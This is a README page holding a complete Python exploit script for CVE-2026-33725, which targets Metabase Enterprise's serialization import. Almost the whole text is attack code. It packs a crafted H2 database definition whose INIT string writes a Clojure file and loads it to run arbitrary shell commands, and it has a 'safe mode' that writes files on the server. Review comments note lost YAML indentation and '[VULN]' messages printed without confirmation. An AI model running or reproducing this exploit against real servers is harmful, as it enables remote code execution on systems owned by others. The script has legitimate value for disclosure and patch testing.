README.md
Rendering markdown...
# Hakai Security - https://hakaisecurity.io
# Authors:
# - Diego Tellaroli <[email protected]>
# - Guilherme d'Ávila <[email protected]>
# - Gabriel Rodrigues <[email protected]>
#
# Created on: 2026-04-20
# Description: Exploit for CVE-2026-33725 - Metabase vulnerable to RCE and Arbitrary File Read via H2 JDBC INIT Injection in EE Serialization Import
#!/usr/bin/env python3
import argparse, io, tarfile, time, requests, urllib3
# Silence urllib3's InsecureRequestWarning for the whole process; main() turns
# off certificate verification on its session when --proxy is given.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Unix timestamp (whole seconds) captured once at import time. main() embeds it
# in the database names and file paths it generates, so each run uses its own.
TS = int(time.time())
def banner():
    """Print the ASCII-art banner (title, CVE id and vendor URL) to stdout."""
    # The leading and trailing empty rows reproduce the blank line before the
    # art and the newline after it.
    rows = (
        "",
        "_____________________________________________________________________________________",
        "______ ___ _________ ___ ____ _____",
        "___ / / /_/ |___/ //_/_/ |__/ _/ / RCE and Arbitrary File Read in Metabase /",
        "__ /_/ /__ /| |__ , <__ /| | _/ / / CVE - 2026 - 33725 /",
        "_ __ /_ ___ |_ /| |_ ___ |__/ / / https://hakaisecurity.io /",
        "/_/ /_/ /_/ |_|/_/ |_|/_/ |_|/___/ / /",
        "________________________________________________________________________________",
        "",
    )
    print("\n".join(rows))
def db_yaml(name: str, subname: str) -> str:
    """Render the YAML text describing one H2 database entry.

    Args:
        name: Database name; written both as ``name`` and as the
            ``serdes/meta`` id.
        subname: Text placed on the line after ``subname: |-``.

    Returns:
        The YAML document as a string. Both arguments are interpolated
        verbatim, with no quoting or escaping.
    """
    # NOTE(review): in this copy every line of the literal starts at column 0,
    # including the keys after `serdes/meta:` / `details:` and the content of
    # the `|-` block scalar, which YAML expects to be indented. The nesting
    # looks to have been lost in extraction -- confirm against the upstream file.
    return f"""\
name: {name}
engine: h2
description: poc
settings: {{}}
serdes/meta:
- id: {name}
model: Database
details:
db: mem:x
subname: |-
{subname}
"""
def cmd_to_clj(cmd):
    """Encode *cmd* as a Clojure ``(str ...)`` form made of character literals.

    Each character becomes one space-separated token: two backslashes followed
    by the character, or by ``space`` / ``newline`` / ``tab`` for those three
    whitespace characters. A backslash becomes four backslashes. The
    backslashes are doubled because, per the original author's note, one level
    is stripped before the form is read.

    Returns:
        The string ``"(str " + tokens + ")"``; an empty *cmd* gives ``"(str )"``.
    """
    named = {' ': 'space', '\n': 'newline', '\t': 'tab'}

    def literal(ch):
        # A backslash is emitted as four backslashes with no name or suffix.
        if ch == '\\':
            return "\\" * 4
        # Named whitespace uses its word; every other character is used as-is.
        return "\\\\" + named.get(ch, ch)

    return "(str " + " ".join(literal(ch) for ch in cmd) + ")"
def build_rce_clj(cmd):
    """Return Clojure source text that passes *cmd* to ``/bin/sh -c``.

    The text is a ``require`` of ``clojure.java.shell`` followed immediately by
    a ``clojure.java.shell/sh`` call whose three arguments are each encoded
    with ``cmd_to_clj``.
    """
    shell, flag, script = (cmd_to_clj(part) for part in ("/bin/sh", "-c", cmd))
    return (
        "(require (quote clojure.java.shell))"
        f"(clojure.java.shell/sh {shell} {flag} {script})"
    )
def build_targz(entries):
    """Build an in-memory gzip-compressed tar archive of database YAML files.

    Args:
        entries: Iterable of ``(db_name, yaml_content)`` pairs.

    Returns:
        An ``io.BytesIO`` rewound to offset 0. It contains the directories
        ``export/`` and ``export/databases/``, then for every entry a directory
        ``export/databases/<db_name>/`` holding ``<db_name>.yaml``.
    """
    def add_dir(archive, path):
        # Directory members carry no data, only a header of type DIRTYPE.
        info = tarfile.TarInfo(path)
        info.type = tarfile.DIRTYPE
        archive.addfile(info)

    out = io.BytesIO()
    with tarfile.open(fileobj=out, mode="w:gz") as archive:
        add_dir(archive, "export/")
        add_dir(archive, "export/databases/")
        for db_name, content in entries:
            add_dir(archive, f"export/databases/{db_name}/")
            payload = content.encode()
            member = tarfile.TarInfo(f"export/databases/{db_name}/{db_name}.yaml")
            # The size must be set explicitly; addfile() reads that many bytes.
            member.size = len(payload)
            archive.addfile(member, io.BytesIO(payload))
    out.seek(0)
    return out
def find_db(s, base, name):
    """Look up a database id by name via ``GET {base}/api/database``.

    Args:
        s: Session-like object exposing ``get(url)``.
        base: Base URL without a trailing slash.
        name: Database name to match exactly.

    Returns:
        The ``id`` of the first entry whose ``name`` equals *name*, or ``None``
        when the request is not OK or nothing matches.
    """
    r = s.get(f"{base}/api/database")
    if not r.ok:
        return None
    # Parse the body once. The listing is accepted either as a bare list or as
    # an object wrapping the list under "data"; the previous code called
    # .get() before its list check, so a bare list raised AttributeError.
    payload = r.json()
    if isinstance(payload, list):
        databases = payload
    elif isinstance(payload, dict):
        databases = payload.get("data", [])
    else:
        databases = []
    for db in databases:
        if db.get("name") == name:
            return db["id"]
    return None
def delete_db(s, base, name):
    """Delete the database called *name*, if ``find_db`` returns an id for it.

    Does nothing when the lookup yields no id (or a falsy one). The DELETE
    response is not inspected.
    """
    existing_id = find_db(s, base, name)
    if not existing_id:
        return
    s.delete(f"{base}/api/database/{existing_id}")
def trigger(s, base, db_id):
    """Send three POST requests that make the server use database *db_id*.

    In order: ``sync_schema`` and ``rescan_values`` on the database, then a
    native ``SELECT 1`` through ``/api/dataset``. Per the original author's
    note the aim is to force a JDBC connection to be opened. Responses are
    ignored and nothing is returned.
    """
    for action in ("sync_schema", "rescan_values"):
        s.post(f"{base}/api/database/{db_id}/{action}")
    query = {"database": db_id, "type": "native", "native": {"query": "SELECT 1"}}
    s.post(f"{base}/api/dataset", json=query)
def do_import(s, base, entries):
    """Upload *entries* as ``export.tar.gz`` to the serialization import endpoint.

    Args:
        s: Session whose ``headers`` mapping is temporarily modified.
        base: Base URL without a trailing slash.
        entries: ``(db_name, yaml_content)`` pairs passed to ``build_targz``.

    Returns:
        ``(status_code, body)`` where *body* is at most the first 3000
        characters of the response text.
    """
    # Drop the session-wide JSON Content-Type for this request; presumably so
    # the multipart header generated for `files=` is used instead.
    s.headers.pop("Content-Type", None)
    archive = build_targz(entries)
    upload = {"file": ("export.tar.gz", archive, "application/gzip")}
    resp = s.post(f"{base}/api/ee/serialization/import", files=upload)
    # Set the JSON Content-Type again for the requests that follow.
    s.headers["Content-Type"] = "application/json"
    return resp.status_code, resp.text[:3000]
def main() -> None:
    """Command-line entry point.

    Parses the arguments, probes the serialization import endpoint, and then,
    unless ``--dry-run`` is set, runs one of two flows: the ``--cmd`` flow or
    the default proof-file flow. Each flow imports one generated database
    definition, looks the database up by name, and calls ``trigger`` on it.
    Progress is reported on stdout with ``[INFO]`` / ``[SAFE]`` / ``[WARN]`` /
    ``[VULN]`` prefixes; nothing is returned.
    """
    banner()
    p = argparse.ArgumentParser(description="CVE-2026-33725: H2 INIT injection via EE serdes import")
    p.add_argument("url", help="Metabase base URL")
    p.add_argument("token", help="Admin session token")
    p.add_argument("--cmd", help="OS command for RCE (Clojure loadFile, no javac)")
    p.add_argument("--outfile", default="/tmp/metabase_poc_pwned.txt", help="Proof file (safe mode)")
    p.add_argument("--dry-run", action="store_true", help="Only check endpoint")
    p.add_argument("--proxy", help="HTTP proxy")
    a = p.parse_args()
    # Normalise the base URL so the f-string paths below never produce "//".
    base = a.url.rstrip("/")
    s = requests.Session()
    s.headers.update({"Content-Type": "application/json", "X-Metabase-Session": a.token})
    if a.proxy:
        # Certificate verification is turned off only when a proxy is given.
        s.proxies = {"http": a.proxy, "https": a.proxy}; s.verify = False
    # Check EE
    # A body-less POST is used purely as a probe; only the status code is read.
    r = s.post(f"{base}/api/ee/serialization/import")
    if r.status_code == 404:
        print("[SAFE] OSS build — endpoint not available"); return
    elif r.status_code == 402:
        # Informational only: execution continues after a 402 here.
        print("[INFO] EE build (needs license)")
    else:
        print(f"[INFO] Endpoint returned HTTP {r.status_code}")
    if a.dry_run:
        return
    if a.cmd:
        # ── RCE: single-INIT three-statement chain ──
        # All in one file-based H2 INIT: CSVWRITE -> CREATE ALIAS -> CALL loadFile
        # File-based H2 serializes connections, avoiding CREATE ALIAS race.
        print(f"[INFO] RCE: {a.cmd}")
        # Paths and the database name embed TS so they differ between runs.
        clj_file = f"/tmp/.poc_{TS}.clj"
        h2_file = f"/tmp/.poc_{TS}_h2"
        name = f"poc_rce_{TS}"
        clj_src = build_rce_clj(a.cmd)
        # Each single quote is replaced by four because the text ends up inside
        # two nested single-quoted SQL string literals.
        sql_inner = clj_src.replace("'", "''''")
        csvwrite = f"CALL CSVWRITE('{clj_file}', 'SELECT ''{sql_inner}'' AS c', 'writeColumnHeader=false fieldDelimiter=')"
        create_alias = 'CREATE ALIAS IF NOT EXISTS LOADCLJ FOR "clojure.lang.Compiler.loadFile"'
        call_load = f"CALL LOADCLJ('{clj_file}')"
        # \; separates statements in H2 INIT
        subname = f"{h2_file};INIT={csvwrite}\\;{create_alias}\\;{call_load}"
        # Remove any database of the same name before importing.
        delete_db(s, base, name)
        code, body = do_import(s, base, [(name, db_yaml(name, subname))])
        print(f"[INFO] Import: HTTP {code}")
        if code == 402:
            print("[INFO] License required"); return
        # Unlike the other branch, a non-200 status and an "assert-not-h2"
        # body are reported with the same message here.
        if code != 200 or "assert-not-h2" in body.lower():
            print(body[:500]); print("[SAFE] Patched or import failed"); return
        # Fixed pause before looking the imported database up by name.
        time.sleep(2)
        db_id = find_db(s, base, name)
        if db_id:
            trigger(s, base, db_id)
            # NOTE(review): [VULN] is printed whenever the database is found;
            # no response from trigger() is inspected, so this is not a
            # confirmation that anything ran.
            print(f"\n[VULN] RCE via H2 INIT subname bypass + Clojure loadFile")
            print(f"[INFO] Verify: check if '{a.cmd}' executed on the server")
        else:
            print("[WARN] DB not found after import")
    else:
        # ── Safe mode: CSVWRITE proof file ──
        name = f"poc_safe_{TS}"
        sub = f"mem:s{TS};INIT=CALL CSVWRITE('{a.outfile}', 'SELECT ''PWNED_VIA_H2_INIT'' AS result')"
        # Remove any database of the same name before importing.
        delete_db(s, base, name)
        code, body = do_import(s, base, [(name, db_yaml(name, sub))])
        print(f"[INFO] Import: HTTP {code}")
        if code == 402:
            print("[INFO] License required"); return
        if code != 200:
            print(body[:500]); return
        if "assert-not-h2" in body.lower():
            print("[SAFE] Patched (H2 rejected)"); return
        # Fixed pause before looking the imported database up by name.
        time.sleep(2)
        db_id = find_db(s, base, name)
        if db_id:
            trigger(s, base, db_id)
            # NOTE(review): as in the --cmd branch, this is printed without
            # checking any response; the proof file must be checked by hand.
            print(f"\n[VULN] CSVWRITE via H2 INIT subname bypass")
            print(f"[INFO] Check: {a.outfile}")
        else:
            print("[WARN] DB not found after import")


# Run main() only when executed as a script, not when imported.
if __name__ == "__main__":
    main()